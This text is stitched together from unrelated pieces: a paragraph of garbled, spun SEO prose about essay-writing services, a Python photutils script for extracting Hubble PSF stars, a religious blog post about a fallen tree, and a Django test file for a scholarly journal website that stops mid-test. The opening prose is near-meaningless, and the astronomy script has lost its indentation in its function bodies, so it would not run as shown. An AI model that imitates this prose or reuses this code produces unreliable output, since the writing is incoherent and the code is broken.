When authoring an essay, it’s vital to observe the creating style and design as there are different forms of design which they can use on the challenge. One particular premier inquiries and need to factor to write a technique essay coming up with helpful tips a person to prepare a substantial amount of authoring website. The remaining condition, that you just ought to think about upon settling on the simplest school essay simply writing internet page, is the way it requires to use only top quality writers.
University students invariably secure and protected mad as they don’t purchase incredible grades for writing courage essays for most of them is convinced this is actually a most basic topic that is known yet the a few the straightforward fact is these are generally inappropriate, you can’t create a valor essay if you happen to don’t have a very appropriate expertise in a persons psyche. Coming up with of content critique isn’t among the main duties you are most likely contemplating. Opting For Matters If you’re assigned essay articles you need to read additional info on the subject and choose regardless of whether you simply must offer an on the whole Introduction or tackle a certain niche market with a large subject matter.
|
import numpy as np
from astropy.table import vstack
from photutils.detection import DAOStarFinder  # top-level import is deprecated in recent photutils
from astropy.nddata import NDData
from photutils.psf import extract_stars
from astropy.io import fits
from astropy.table import Table
datadir = '/melkor/d1/guenther/downdata/HST/CepMASTfull/'
# I blinked through the images in ds9 to find single, isolated well-exposed
# stars not too far from the center but outside of the Cepheid PSF and not on
# any of the diffraction spikes.
prflist = [
['ibg405010_drz.fits', 340, 38],
['ibg416010_drz.fits', 443, 215],
['ibg418010_drz.fits', 112, 945],
['ibg422010_drz.fits', 895, 319],
['ibg426010_drz.fits', 385, 93],
['ibg436010_drz.fits', 342, 877],
['ibg438010_drz.fits', 416, 401],
['ibg440010_drz.fits', 211, 337],
['ibg443010_drz.fits', 359, 288],
['ibg444010_drz.fits', 328, 345],
['ibg444010_drz.fits', 725, 723],
['ibg446010_drz.fits', 276, 500],
['ibg453010_drz.fits', 812, 845],
['ibg453010_drz.fits', 333, 188],
['ibg455010_drz.fits', 263, 444],
['ibg456010_drz.fits', 529, 696],
['ibg458010_drz.fits', 161, 806],
['ibg459010_drz.fits', 374, 166],
['ibg465010_drz.fits', 588, 723],
['ibg468010_drz.fits', 150, 508],
['ibg471010_drz.fits', 600, 685],
['ibg471010_drz.fits', 892, 511],
]
#prflist = [['ibg402010_drz.fits', 612, 209],
# ['ibg402010_drz.fits', 1007, 951],
# ['ibg402010_drz.fits', 488, 705], # GAIA bad
# ['ibg403010_drz.fits', 597, 385],
# ['ibg405010_drz.fits', 570, 701], # GAIA bad
# ['ibg455010_drz.fits', 263, 444],
# ['ibg456010_drz.fits', 530, 696],
# ['ibg456010_drz.fits', 549, 462], # GAIA bad
# ['ibg456010_drz.fits', 860, 408],
# ['ibg456010_drz.fits', 911, 115],
# ['ibg465010_drz.fits', 588, 723],
# ['ibg471010_drz.fits', 600, 685],
# ['ibg471010_drz.fits', 892, 511],
#]
# -1 because the above positions are measured in ds9, which counts from (1,1)
# while the python code counts from (0,0)
stars621 = extract_stars([NDData(fits.open(datadir + row[0])[1].data) for row in prflist],
[Table({'x': [row[1] - 1], 'y': [row[2] - 1]}) for row in prflist],
size=25)
stars845 = extract_stars([NDData(fits.open(datadir + row[0].replace('10_', '20_'))[1].data) for row in prflist],
[Table({'x': [row[1] - 1], 'y': [row[2] - 1]}) for row in prflist],
size=25)
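The one-pixel shift applied in the `extract_stars` calls above follows the comment about ds9 coordinates. It can be captured in a tiny helper (a hypothetical name, not part of the original script):

```python
def ds9_to_numpy(x_ds9, y_ds9):
    """Convert 1-based ds9 pixel coordinates to 0-based numpy indices."""
    return x_ds9 - 1, y_ds9 - 1

# The first entry of prflist, converted for use with python arrays:
print(ds9_to_numpy(340, 38))  # (339, 37)
```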
def check_matching_source_exists(l1, l2, d,
xname='xcentroid', yname='ycentroid'):
    '''Check, for each source in l1, whether one or more sources in l2 are close.

    This is not the most efficient way to do things, but it is very quick to
    code, and runtime is not a concern here.

    Parameters
    ----------
    l1, l2 : two source lists
    d : float or None
        maximal distance in pix; `None` means that all input sources are
        returned
    xname, yname : string
        names of the centroid columns in ``l1`` and ``l2``

    Returns
    -------
    ind1 : array
        Array of indices for l1. All elements listed in this index have at
        least one source in l2 within the given distance ``d``.
    '''
ind1 = []
for i, s in enumerate(l1):
dsquared = (s[xname] - l2[xname])**2 + (s[yname] - l2[yname])**2
if (d is None) or (np.min(dsquared) < d**2):
ind1.append(i)
return ind1
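The matching test above is a plain nearest-neighbour check. A minimal standalone sketch of the same logic, using coordinate tuples instead of astropy tables (names here are illustrative, not from the original script):

```python
def matching_exists(l1, l2, d):
    """Return indices of points in l1 that have at least one point of l2
    within distance d; d=None keeps every index."""
    ind = []
    for i, (x1, y1) in enumerate(l1):
        if d is None or any((x1 - x2) ** 2 + (y1 - y2) ** 2 < d ** 2
                            for x2, y2 in l2):
            ind.append(i)
    return ind

src_a = [(10.0, 10.0), (50.0, 50.0)]
src_b = [(11.0, 9.5)]
print(matching_exists(src_a, src_b, 3.0))  # only the first source has a neighbour
```

As in the original function, the comparison is done on squared distances, so no square root is ever taken.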
def combine_source_tables(list621, list845, names, dmax=10, **kwargs):
    '''Combine source tables. Input are two lists of tables in different bands.

    This function:

    - only keeps sources if there is a source in the second band within
      ``dmax`` pixels,
    - adds table columns with the filter and the target name (from input
      ``names``),
    - stacks everything into one big table.
    '''
finallist = []
for i in range(len(list621)):
l1 = list621[i]
l2 = list845[i]
if len(l1) > 0:
l1['filter'] = 'F621M'
l1['TARGNAME'] = names[i]
if len(l2) > 0:
l2['filter'] = 'F845M'
l2['TARGNAME'] = names[i]
if (dmax is not None) and len(l1) > 0 and len(l2) > 0:
l1short = l1[check_matching_source_exists(l1, l2, dmax, **kwargs)]
l2short = l2[check_matching_source_exists(l2, l1, dmax, **kwargs)]
l1 = l1short
l2 = l2short
finallist.append(vstack([l1, l2]))
return vstack(finallist)
class DAOStarAutoThresholdFinder(DAOStarFinder):
    '''A DAOStarFinder that derives its detection threshold from the data.

    The threshold is set to ``threshold_scale`` times the standard deviation
    of the image passed to ``__call__``.
    '''
    def __init__(self, threshold_scale=5, **kwargs):
        self.threshold_in = threshold_scale
        # super().__init__ requires a threshold value, but it is recomputed
        # from the data on every call, so any placeholder will do.
        super().__init__(threshold=1, **kwargs)
def __call__(self, data, *args, **kwargs):
self.threshold = self.threshold_in * np.std(data)
self.threshold_eff = self.threshold * self.kernel.relerr
return super().__call__(data, *args, **kwargs)
initial_finder = DAOStarAutoThresholdFinder(fwhm=2.5, threshold_scale=5.,
sharplo=0.55, sharphi=.75,
roundlo=-0.6, roundhi=0.6)
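The data-driven threshold rule in `DAOStarAutoThresholdFinder.__call__` can be illustrated on its own. This sketch mirrors the `threshold_scale * np.std(data)` computation in pure Python (`statistics.pstdev` is the population standard deviation, matching numpy's default `ddof=0`); the function name is illustrative:

```python
import statistics

def auto_threshold(data, threshold_scale=5.0):
    """Scale the image's standard deviation, as the finder does per call."""
    flat = [value for row in data for value in row]
    return threshold_scale * statistics.pstdev(flat)

image = [[10.0, 10.0, 10.0],
         [10.0, 50.0, 10.0],   # one bright pixel drives up the std
         [10.0, 10.0, 10.0]]
print(auto_threshold(image))
```

Because the threshold is recomputed for each image, frames with different noise levels can be run through the same finder instance without retuning.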
|
If a tree falls in your driveway and no one is around, does it make a sound?
Last Sunday I had the most interesting and enlightening thing happen. My wife and I were leaving the house and heading to church. As I approached the driveway, I was met with the unexpected sight of my 30-foot tree lying across my driveway and onto my car. The ordinarily steady symbol of strength had fallen.
It took a few seconds for this odd sight to register in my brain. While I have heard of such things happening from time to time, I had never actually seen it up close. MY tree fell on MY car. But why? There was no particular storm the night before. There was no rain (I live in Southern California). There was no obvious reason why that tree should fall.
After closer examination, I think I found the reason. Upon further review, the inside of the tree appeared to be infested with termites. The root system had been damaged.
The tree was strong looking on the outside, yet weak on the inside. This tree gave the perception of strength while living in the reality of weakness. Thriving in the visible, suffering in the invisible. And great was its fall.
How many times have we seen public figures, while appearing strong on the outside, experience a great fall? And upon further review, the interior is always in a weakened state. The root system is always vulnerable.
Let my fallen tree be a reminder, or perhaps a wake-up call, to us all! We often spend so much time working on outward appearances that we neglect our inward strength, depth and integrity. Sooner or later a storm always comes. And in the case of my tree, it was so weak on the inside that it didn't even require much of a storm to cause its fall.
Let's be strong for our families! Let's focus on our interior rather than our exterior. Let's sink deep roots in things that matter. Our daughters need a strong role model and a pillar of strength to look up to. No one is above a fall. Guard your interior. Strengthen your roots and remain strong. Let there be no great fall in your life!
Blessings to you and yours and thank you for the reminder and encouragement!
Thank you Paul – Hope you are well!
|
from bs4 import BeautifulSoup
from collections import OrderedDict
from lxml import etree as et
import datetime as dt
import io
import os
import pikepdf
import unittest.mock
import subprocess
import itertools
from hashlib import md5
from unittest.mock import PropertyMock
from django.contrib.auth.models import AnonymousUser
from django.core.exceptions import PermissionDenied
from django.urls import reverse
from django.http.response import HttpResponseRedirect
from django.test import Client
from django.test import TestCase, RequestFactory
from django.conf import settings
from django.test.utils import override_settings
import pytest
from apps.public.journal.viewmixins import SolrDataMixin
from core.subscription.test.utils import generate_casa_token
from erudit.models import JournalType, Issue, Article, Journal
from erudit.test.factories import ArticleFactory
from erudit.test.factories import CollectionFactory
from erudit.test.factories import DisciplineFactory
from erudit.test.factories import IssueFactory
from erudit.test.factories import EmbargoedIssueFactory
from erudit.test.factories import OpenAccessIssueFactory
from erudit.test.factories import JournalFactory
from erudit.test.factories import JournalInformationFactory
from erudit.test.solr import FakeSolrData
from erudit.fedora.objects import JournalDigitalObject
from erudit.fedora.objects import ArticleDigitalObject
from erudit.fedora.objects import MediaDigitalObject
from erudit.fedora import repository
from erudit.solr.models import Article as SolrArticle
from base.test.factories import UserFactory
from core.subscription.test.factories import JournalAccessSubscriptionFactory
from core.subscription.models import UserSubscriptions
from core.subscription.test.factories import JournalManagementSubscriptionFactory
from core.metrics.conf import settings as metrics_settings
from apps.public.journal.views import ArticleMediaView
from apps.public.journal.views import ArticleRawPdfView
from apps.public.journal.views import ArticleRawPdfFirstPageView
FIXTURE_ROOT = os.path.join(os.path.dirname(__file__), 'fixtures')
pytestmark = pytest.mark.django_db
def journal_detail_url(journal):
return reverse('public:journal:journal_detail', kwargs={'code': journal.code})
def issue_detail_url(issue):
return reverse('public:journal:issue_detail', args=[
issue.journal.code, issue.volume_slug, issue.localidentifier])
def article_detail_url(article):
return reverse('public:journal:article_detail', kwargs={
'journal_code': article.issue.journal.code,
'issue_slug': article.issue.volume_slug,
'issue_localid': article.issue.localidentifier,
'localid': article.localidentifier,
})
def article_raw_pdf_url(article):
issue = article.issue
journal_id = issue.journal.localidentifier
issue_id = issue.localidentifier
article_id = article.localidentifier
return reverse('public:journal:article_raw_pdf', args=(
journal_id, issue.volume_slug, issue_id, article_id
))
class TestJournalListView:
@pytest.fixture(autouse=True)
def setup(self):
self.client = Client()
self.user = UserFactory.create(username='foobar')
self.user.set_password('notsecret')
self.user.save()
def test_upcoming_journals_are_hidden_from_list(self):
# Create 6 journals
journals = JournalFactory.create_batch(6)
# Create an issue for the first 5 journals
for journal in journals[:5]:
IssueFactory(journal=journal)
url = reverse('public:journal:journal_list')
# Run
response = self.client.get(url)
displayed_journals = set(response.context['journals'])
assert displayed_journals == set(journals[:5])
assert journals[5] not in displayed_journals
def test_can_sort_journals_by_name(self):
# Setup
collection = CollectionFactory.create()
journal_1 = JournalFactory.create_with_issue(collection=collection, name='ABC journal')
journal_2 = JournalFactory.create_with_issue(collection=collection, name='ACD journal')
journal_3 = JournalFactory.create_with_issue(collection=collection, name='DEF journal')
journal_4 = JournalFactory.create_with_issue(collection=collection, name='GHI journal')
journal_5 = JournalFactory.create_with_issue(collection=collection, name='GIJ journal')
journal_6 = JournalFactory.create_with_issue(collection=collection, name='GJK journal')
url = reverse('public:journal:journal_list')
# Run
response = self.client.get(url)
# Check
assert response.status_code == 200
assert len(response.context['sorted_objects']) == 3
assert response.context['sorted_objects'][0]['key'] == 'A'
assert response.context['sorted_objects'][0]['objects'] == [
journal_1, journal_2, ]
assert response.context['sorted_objects'][1]['key'] == 'D'
assert response.context['sorted_objects'][1]['objects'] == [journal_3, ]
assert response.context['sorted_objects'][2]['key'] == 'G'
assert response.context['sorted_objects'][2]['objects'] == [
journal_4, journal_5, journal_6, ]
def test_can_sort_journals_by_disciplines(self):
# Setup
collection = CollectionFactory.create()
discipline_1 = DisciplineFactory.create(code='abc-discipline', name='ABC')
discipline_2 = DisciplineFactory.create(code='def-discipline', name='DEF')
discipline_3 = DisciplineFactory.create(code='ghi-discipline', name='GHI')
journal_1 = JournalFactory.create_with_issue(collection=collection)
journal_1.disciplines.add(discipline_1)
journal_2 = JournalFactory.create_with_issue(collection=collection)
journal_2.disciplines.add(discipline_1)
journal_3 = JournalFactory.create_with_issue(collection=collection)
journal_3.disciplines.add(discipline_2)
journal_4 = JournalFactory.create_with_issue(collection=collection)
journal_4.disciplines.add(discipline_3)
journal_5 = JournalFactory.create_with_issue(collection=collection)
journal_5.disciplines.add(discipline_3)
journal_6 = JournalFactory.create_with_issue(collection=collection)
journal_6.disciplines.add(discipline_3)
url = reverse('public:journal:journal_list')
# Run
response = self.client.get(url, {'sorting': 'disciplines'})
# Check
assert response.status_code == 200
assert len(response.context['sorted_objects']) == 3
assert response.context['sorted_objects'][0]['key'] == discipline_1.code
assert response.context['sorted_objects'][0]['collections'][0]['key'] == collection
assert response.context['sorted_objects'][0]['collections'][0]['objects'] == [
journal_1, journal_2, ]
assert response.context['sorted_objects'][1]['key'] == discipline_2.code
assert response.context['sorted_objects'][1]['collections'][0]['key'] == collection
assert response.context['sorted_objects'][1]['collections'][0]['objects'] == [journal_3, ]
assert response.context['sorted_objects'][2]['key'] == discipline_3.code
assert response.context['sorted_objects'][2]['collections'][0]['key'] == collection
assert set(response.context['sorted_objects'][2]['collections'][0]['objects']) == set([
journal_4, journal_5, journal_6, ])
def test_only_main_collections_are_shown_by_default(self):
collection = CollectionFactory.create()
main_collection = CollectionFactory.create(is_main_collection=True)
JournalFactory.create_with_issue(collection=collection)
journal2 = JournalFactory.create_with_issue(collection=main_collection)
url = reverse('public:journal:journal_list')
response = self.client.get(url)
assert list(response.context['journals']) == [journal2]
def test_can_filter_the_journals_by_open_access(self):
# Setup
collection = CollectionFactory.create()
journal_1 = JournalFactory.create_with_issue(collection=collection, open_access=True)
JournalFactory.create(collection=collection, open_access=False)
url = reverse('public:journal:journal_list')
# Run
response = self.client.get(url, data={'open_access': True})
# Check
assert list(response.context['journals']) == [journal_1, ]
def test_can_filter_the_journals_by_types(self):
# Setup
collection = CollectionFactory.create()
jtype_1 = JournalType.objects.create(code='T1', name='T1')
jtype_2 = JournalType.objects.create(code='T2', name='T2')
JournalFactory.create(collection=collection, type=jtype_1)
journal_2 = JournalFactory.create_with_issue(collection=collection, type=jtype_2)
url = reverse('public:journal:journal_list')
# Run
response = self.client.get(url, data={'types': ['T2', ]})
# Check
assert list(response.context['journals']) == [journal_2, ]
def test_can_filter_the_journals_by_collections(self):
# Setup
col_1 = CollectionFactory(code='col1')
col_2 = CollectionFactory(code='col2')
JournalFactory.create_with_issue(collection=col_1)
journal_2 = JournalFactory.create_with_issue(collection=col_2)
url = reverse('public:journal:journal_list')
# Run
response = self.client.get(url, data={'collections': ['col2', ]})
# Check
assert list(response.context['journals']) == [journal_2, ]
def test_can_filter_the_journals_by_disciplines(self):
j1 = JournalFactory.create_with_issue(disciplines=['d1', 'd2'])
j2 = JournalFactory.create_with_issue(disciplines=['d2'])
j3 = JournalFactory.create_with_issue(disciplines=['d3'])
JournalFactory.create_with_issue(disciplines=['d4'])
url = reverse('public:journal:journal_list')
response = self.client.get(url, data={'disciplines': ['d2', 'd3']})
assert set(response.context['journals']) == {j1, j2, j3}
def test_new_journal_titles_are_not_uppercased(self):
journal = JournalFactory(is_new=True, name='Enjeux et société')
url = reverse('public:journal:journal_list')
html = self.client.get(url).content.decode()
dom = BeautifulSoup(html, 'html.parser')
journals_list = dom.find('div', {'class': 'journals-list'})
assert 'Enjeux et société' in journals_list.decode()
assert 'Enjeux Et Société' not in journals_list.decode()
def test_journal_year_of_addition_is_displayed(self):
journal = JournalFactory(is_new=True, year_of_addition='2020')
url = reverse('public:journal:journal_list')
html = self.client.get(url).content.decode()
dom = BeautifulSoup(html, 'html.parser')
journals_list = dom.find('div', {'class': 'journals-list'})
assert '(nouveauté 2020)' in journals_list.decode()
@pytest.mark.parametrize('logo, expected_logo_display', [
('logo.png', True),
(False, False),
])
def test_do_not_display_non_existent_journal_logo_on_list_per_disciplines(
self, logo, expected_logo_display,
):
journal = JournalFactory.create_with_issue(code='journal', name='Journal')
journal.disciplines.add(DisciplineFactory())
if logo:
repository.api.register_datastream(
journal.get_full_identifier(),
'/LOGO/content',
open(settings.MEDIA_ROOT + '/' + logo, 'rb').read(),
)
url = reverse('public:journal:journal_list')
html = self.client.get(url, {'sorting': 'disciplines'}).content.decode()
logo = '<img\n ' \
'src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQV' \
'R42mNkYAAAAAYAAjCB0C8AAAAASUVORK5CYII="\n ' \
'data-src="/logo/journal/20110811144159.jpg"\n ' \
'alt="Logo pour Inter"\n ' \
'class="lazyload img-responsive card__figure"\n ' \
'/>'
if expected_logo_display:
assert logo in html
else:
assert logo not in html
class TestJournalDetailView:
@pytest.fixture(autouse=True)
def setup(self, settings):
settings.DEBUG = True
self.client = Client()
self.user = UserFactory.create(username='foobar')
self.user.set_password('notsecret')
self.user.save()
def test_main_title_is_always_in_context(self):
journal = JournalFactory()
response = self.client.get(journal_detail_url(journal))
assert 'main_title' in response.context.keys()
def test_can_embed_the_journal_information_in_the_context_if_available(self):
# Setup
journal_info = JournalInformationFactory(journal=JournalFactory())
url_1 = journal_detail_url(journal_info.journal)
journal_2 = JournalFactory()
url_2 = journal_detail_url(journal_2)
# Run
response_1 = self.client.get(url_1)
response_2 = self.client.get(url_2)
# Check
assert response_1.status_code == response_2.status_code == 200
assert response_1.context['journal_info'] == journal_info
assert response_2.context['journal_info'] == {'updated': None}
def test_can_display_when_issues_have_a_space_in_their_number(self, monkeypatch):
monkeypatch.setattr(Issue, 'erudit_object', unittest.mock.MagicMock())
issue = IssueFactory(number='2 bis')
url_1 = journal_detail_url(issue.journal)
# Run
response_1 = self.client.get(url_1)
assert response_1.status_code == 200
def test_can_embed_the_published_issues_in_the_context(self):
# Setup
journal = JournalFactory(collection=CollectionFactory(localidentifier='erudit'))
issue = IssueFactory(journal=journal)
IssueFactory(journal=journal, is_published=False)
url = journal_detail_url(journal)
# Run
response = self.client.get(url)
# Check
assert response.status_code == 200
assert list(response.context['issues']) == [issue]
def test_can_embed_the_current_issue_in_the_context(self):
issue1 = IssueFactory.create()
issue2 = IssueFactory.create_published_after(issue1)
url = journal_detail_url(issue1.journal)
response = self.client.get(url)
assert response.status_code == 200
assert response.context['current_issue'] == issue2
def test_can_embed_the_current_issue_external_url_in_the_context(self):
        # If the latest issue has an external URL, its link properly reflects
        # that (proper href, blank target).
external_url = 'https://example.com'
issue1 = IssueFactory.create()
issue2 = IssueFactory.create_published_after(issue1, external_url=external_url)
url = journal_detail_url(issue1.journal)
response = self.client.get(url)
assert response.status_code == 200
assert response.context['current_issue'] == issue2
link_attrs = response.context['current_issue'].extra.detail_link_attrs()
assert external_url in link_attrs
assert '_blank' in link_attrs
def test_external_issues_are_never_locked(self):
# when an issue has an external url, we never show a little lock icon next to it.
external_url = 'https://example.com'
collection = CollectionFactory.create(code='erudit')
journal = JournalFactory(open_access=False, collection=collection) # embargoed
issue1 = IssueFactory.create(journal=journal, external_url=external_url)
url = journal_detail_url(issue1.journal)
response = self.client.get(url)
assert not response.context['current_issue'].extra.is_locked()
def test_embeds_subscription_info_to_context(self):
subscription = JournalAccessSubscriptionFactory(
type='individual',
user=self.user,
valid=True,
)
self.client.login(username='foobar', password='notsecret')
url = journal_detail_url(subscription.journal_management_subscription.journal)
response = self.client.get(url)
assert response.status_code == 200
assert response.context['content_access_granted']
assert response.context['subscription_type'] == 'individual'
def test_journal_detail_has_elements_for_anchors(self):
issue = IssueFactory()
url = journal_detail_url(issue.journal)
response = self.client.get(url)
content = response.content
assert b'<li role="presentation"' in content
assert b'<section role="tabpanel"' in content
assert b'<li role="presentation" id="journal-info-about-li"' not in content
assert b'<section role="tabpanel" class="tab-pane journal-info-block" id="journal-info-about"' not in content
@pytest.mark.parametrize('charges_apc', (True, False))
def test_journal_detail_has_no_apc_mention_if_it_charges_apc(self, charges_apc):
journal = JournalFactory(charges_apc=charges_apc)
url = journal_detail_url(journal)
response = self.client.get(url)
content = response.content
if not charges_apc:
assert b'Frais de publication' in content
else:
assert b'Frais de publication' not in content
@pytest.mark.parametrize('localidentifier', ('journal', 'previous_journal'))
def test_journal_notes_with_previous_journal(self, localidentifier):
journal = JournalFactory(
localidentifier=localidentifier,
notes=[
{
'pid': 'erudit:erudit.journal',
'langue': 'fr',
'content': 'Note pour journal',
},
{
'pid': 'erudit:erudit.previous_journal',
'langue': 'fr',
'content': 'Note pour previous_journal',
},
],
)
IssueFactory(journal=journal)
html = self.client.get(journal_detail_url(journal)).content.decode()
if localidentifier == 'journal':
assert 'Note pour journal' in html
assert 'Note pour previous_journal' not in html
elif localidentifier == 'previous_journal':
assert 'Note pour journal' not in html
assert 'Note pour previous_journal' in html
class TestJournalAuthorsListView:
def test_provides_only_authors_for_the_first_available_letter_by_default(self):
issue_1 = IssueFactory.create(date_published=dt.datetime.now())
ArticleFactory.create(issue=issue_1, authors=['btest', 'ctest1', 'ctest2'])
url = reverse('public:journal:journal_authors_list', kwargs={'code': issue_1.journal.code})
response = Client().get(url)
assert response.status_code == 200
assert set(response.context['authors_dicts'].keys()) == {'btest', }
def test_only_provides_authors_for_the_given_letter(self):
issue_1 = IssueFactory.create(date_published=dt.datetime.now())
ArticleFactory.create(issue=issue_1, authors=['btest', 'ctest1'])
url = reverse('public:journal:journal_authors_list', kwargs={'code': issue_1.journal.code})
response = Client().get(url, letter='b')
assert response.status_code == 200
authors_dicts = response.context['authors_dicts']
assert len(authors_dicts) == 1
assert authors_dicts.keys() == {'btest', }
def test_can_provide_contributors_of_article(self):
issue_1 = IssueFactory.create(date_published=dt.datetime.now())
ArticleFactory.create(issue=issue_1, authors=['btest', 'ctest1'])
url = reverse('public:journal:journal_authors_list', kwargs={'code': issue_1.journal.code})
response = Client().get(url, letter='b')
assert response.status_code == 200
authors_dicts = response.context['authors_dicts']
contributors = authors_dicts['btest'][0]['contributors']
assert contributors == ['ctest1']
def test_dont_show_unpublished_articles(self):
issue1 = IssueFactory.create(is_published=False)
issue2 = IssueFactory.create(journal=issue1.journal, is_published=True)
ArticleFactory.create(issue=issue1, authors=['foo'])
ArticleFactory.create(issue=issue2, authors=['foo'])
# Unpublished articles aren't in solr
url = reverse('public:journal:journal_authors_list', kwargs={'code': issue1.journal.code})
response = Client().get(url, letter='f')
authors_dicts = response.context['authors_dicts']
# only one of the two articles are there
assert len(authors_dicts['foo']) == 1
def test_can_filter_by_article_type(self):
issue_1 = IssueFactory.create(date_published=dt.datetime.now())
ArticleFactory.create(issue=issue_1, type='article', authors=['btest'])
ArticleFactory.create(issue=issue_1, type='compterendu', authors=['btest'])
url = reverse('public:journal:journal_authors_list', kwargs={'code': issue_1.journal.code})
response = Client().get(url, article_type='article')
assert response.status_code == 200
authors_dicts = response.context['authors_dicts']
assert len(authors_dicts) == 1
def test_can_filter_by_article_type_when_no_article_of_type(self):
issue_1 = IssueFactory.create(date_published=dt.datetime.now())
ArticleFactory.create(issue=issue_1, type='article', authors=['atest'])
url = reverse('public:journal:journal_authors_list', kwargs={'code': issue_1.journal.code})
response = Client().get(url, {"article_type": 'compterendu'})
assert response.status_code == 200
def test_only_letters_with_results_are_active(self):
""" Test that for a given selection in the authors list view, only the letters for which
results are present are shown """
issue_1 = IssueFactory.create(journal=JournalFactory(), date_published=dt.datetime.now())
ArticleFactory.create(issue=issue_1, type='article', authors=['atest'])
ArticleFactory.create(issue=issue_1, type='compterendu', authors=['btest'])
url = reverse('public:journal:journal_authors_list', kwargs={'code': issue_1.journal.code})
response = Client().get(url, {"article_type": 'compterendu'})
assert response.status_code == 200
assert not response.context['letters_exists'].get('A')
def test_do_not_fail_when_user_requests_a_letter_with_no_articles(self):
issue_1 = IssueFactory.create(date_published=dt.datetime.now())
ArticleFactory.create(issue=issue_1, type='article', authors=['btest'])
url = reverse('public:journal:journal_authors_list', kwargs={'code': issue_1.journal.code})
response = Client().get(url, {"article_type": 'compterendu', 'letter': 'A'})
assert response.status_code == 200
def test_inserts_the_current_letter_in_the_context(self):
issue_1 = IssueFactory.create(date_published=dt.datetime.now())
ArticleFactory.create(issue=issue_1, authors=['btest', 'ctest1', 'ctest2'])
url = reverse('public:journal:journal_authors_list', kwargs={'code': issue_1.journal.code})
response_1 = Client().get(url)
response_2 = Client().get(url, {'letter': 'C'})
response_3 = Client().get(url, {'letter': 'invalid'})
assert response_1.status_code == 200
assert response_2.status_code == 200
assert response_3.status_code == 200
assert response_1.context['letter'] == 'B'
assert response_2.context['letter'] == 'C'
assert response_3.context['letter'] == 'B'
def test_inserts_a_dict_with_the_letters_counts_in_the_context(self):
issue_1 = IssueFactory.create(date_published=dt.datetime.now())
ArticleFactory.create(issue=issue_1, authors=['btest', 'ctest1', 'ctest2'])
url = reverse('public:journal:journal_authors_list', kwargs={'code': issue_1.journal.code})
response = Client().get(url)
assert response.status_code == 200
assert len(response.context['letters_exists']) == 26
assert response.context['letters_exists']['B']
assert response.context['letters_exists']['C']
for letter in 'adefghijklmnopqrstuvwxyz':
assert not response.context['letters_exists'][letter.upper()]
@pytest.mark.parametrize('article_type,expected', [('compterendu', True), ('article', False)])
def test_view_has_multiple_article_types(self, article_type, expected):
article1 = ArticleFactory.create(type='article', authors=['btest'])
ArticleFactory.create(issue=article1.issue, type=article_type, authors=['btest'])
url = reverse(
'public:journal:journal_authors_list',
kwargs={'code': article1.issue.journal.code})
response = Client().get(url)
assert response.context['view'].has_multiple_article_types == expected
def test_no_duplicate_authors_with_lowercase_and_uppercase_names(self):
issue = IssueFactory(journal__code='journal')
ArticleFactory.create(issue=issue, localidentifier='article1', authors=['FOO, BAR'])
ArticleFactory.create(issue=issue, localidentifier='article2', authors=['FOO, Bar'])
ArticleFactory.create(issue=issue, localidentifier='article3', authors=['Foo, Bar'])
url = reverse('public:journal:journal_authors_list', kwargs={'code': 'journal'})
response = Client().get(url)
assert response.context['authors_dicts'] == OrderedDict({
'foo-bar': [
{
'author': 'FOO, BAR',
'contributors': [],
'id': 'article1',
'title': 'Robert Southey, Writing and Romanticism',
'url': None,
'year': '2',
}, {
'author': 'FOO, Bar',
'contributors': [],
'id': 'article2',
'title': 'Robert Southey, Writing and Romanticism',
'url': None,
'year': '2',
}, {
'author': 'Foo, Bar',
'contributors': [],
'id': 'article3',
'title': 'Robert Southey, Writing and Romanticism',
'url': None,
'year': '2',
},
],
})
class TestIssueDetailView:
def test_works_with_pks(self):
issue = IssueFactory.create(date_published=dt.datetime.now())
url = issue_detail_url(issue)
response = Client().get(url)
assert response.status_code == 200
@pytest.mark.parametrize("is_published,has_ticket,expected_code", [
(True, False, 200),
(True, True, 200),
(False, False, 302),
(False, True, 200),
])
def test_can_accept_prepublication_ticket(self, is_published, has_ticket, expected_code):
localidentifier = "espace03368"
issue = IssueFactory(localidentifier=localidentifier, is_published=is_published)
url = issue_detail_url(issue)
data = None
if has_ticket:
ticket = md5(localidentifier.encode()).hexdigest()
data = {'ticket': ticket}
response = Client().get(url, data=data)
assert response.status_code == expected_code
def test_works_with_localidentifiers(self):
issue = IssueFactory.create(
date_published=dt.datetime.now(), localidentifier='test')
url = issue_detail_url(issue)
response = Client().get(url)
assert response.status_code == 200
def test_fedora_issue_with_external_url_redirects(self):
# When we have an issue with a fedora localidentifier *and* external_url set, we redirect
# to that external url when we hit the detail view.
# ref #1651
issue = IssueFactory.create(
date_published=dt.datetime.now(), localidentifier='test',
external_url='http://example.com')
url = issue_detail_url(issue)
response = Client().get(url)
assert response.status_code == 302
assert response.url == 'http://example.com'
def test_can_render_issue_summary_when_db_contains_articles_not_in_summary(self):
# Articles in the issue view are ordered according to the list specified in the erudit
# object. If an article isn't referenced in the erudit object list, then it will not be
# shown. We rely on the fact that the default patched issue points to liberte1035607
# ref support#216
issue = IssueFactory.create()
a1 = ArticleFactory.create(issue=issue, localidentifier='31492ac')
a2 = ArticleFactory.create(issue=issue, localidentifier='31491ac')
ArticleFactory.create(issue=issue, localidentifier='not-there', add_to_fedora_issue=False)
url = issue_detail_url(issue)
response = Client().get(url)
articles = response.context['articles']
assert articles == [a1, a2]
@pytest.mark.parametrize("factory, expected_lock", [
(EmbargoedIssueFactory, True),
(OpenAccessIssueFactory, False),
])
def test_embargo_lock_icon(self, factory, expected_lock):
issue = factory(is_published=False)
url = issue_detail_url(issue)
response = Client().get(url, {'ticket': issue.prepublication_ticket})
# The embargo lock icon should never be displayed when a prepublication ticket is provided.
assert b'ion-ios-lock' not in response.content
issue.is_published = True
issue.save()
response = Client().get(url)
# The embargo lock icon should only be displayed on embargoed issues.
assert (b'ion-ios-lock' in response.content) == expected_lock
def test_article_items_are_not_cached_for_unpublished_issues(self):
issue = IssueFactory(is_published=False)
article = ArticleFactory(issue=issue, title="thisismyoldtitle")
url = issue_detail_url(issue)
resp = Client().get(url, {'ticket': issue.prepublication_ticket})
assert "thisismyoldtitle" in resp.content.decode('utf-8')
with repository.api.open_article(article.pid) as wrapper:
wrapper.set_title('thisismynewtitle')
resp = Client().get(url, {'ticket': issue.prepublication_ticket})
assert "thisismynewtitle" in resp.content.decode('utf-8')
@override_settings(CACHES=settings.LOCMEM_CACHES)
def test_article_items_are_cached_for_published_issues(self):
issue = IssueFactory(is_published=True)
article = ArticleFactory(issue=issue, title="thisismyoldtitle")
url = issue_detail_url(issue)
resp = Client().get(url)
